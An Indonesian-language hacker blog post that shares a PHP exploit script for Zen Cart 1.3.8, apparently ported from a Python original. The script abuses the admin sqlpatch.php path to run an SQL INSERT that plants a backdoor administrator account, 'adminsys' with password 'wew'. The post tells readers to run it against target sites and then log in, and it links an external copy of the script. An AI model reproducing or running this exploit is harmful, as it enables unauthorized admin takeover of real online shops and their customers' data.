Lama nggak update blog...
ahkir ahkir ini banyak anak anak yang cari cari target zencart.
iseng aku coba rubah zen.py yang berbasis phyton di milw0rm ke php.
jalan kan scripts php dibawah ini kalau hasilnya done
coba login adminya dengan
username : adminsys
password : wew
ini scriptsnya:
http://noscan.xp3.biz/zen.txt
#!/usr/bin/php
if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================
root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}
function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);
if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}
$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}
$url = $argv[1];
$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";
$req = gets($form,"query_string=$enc");
if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}
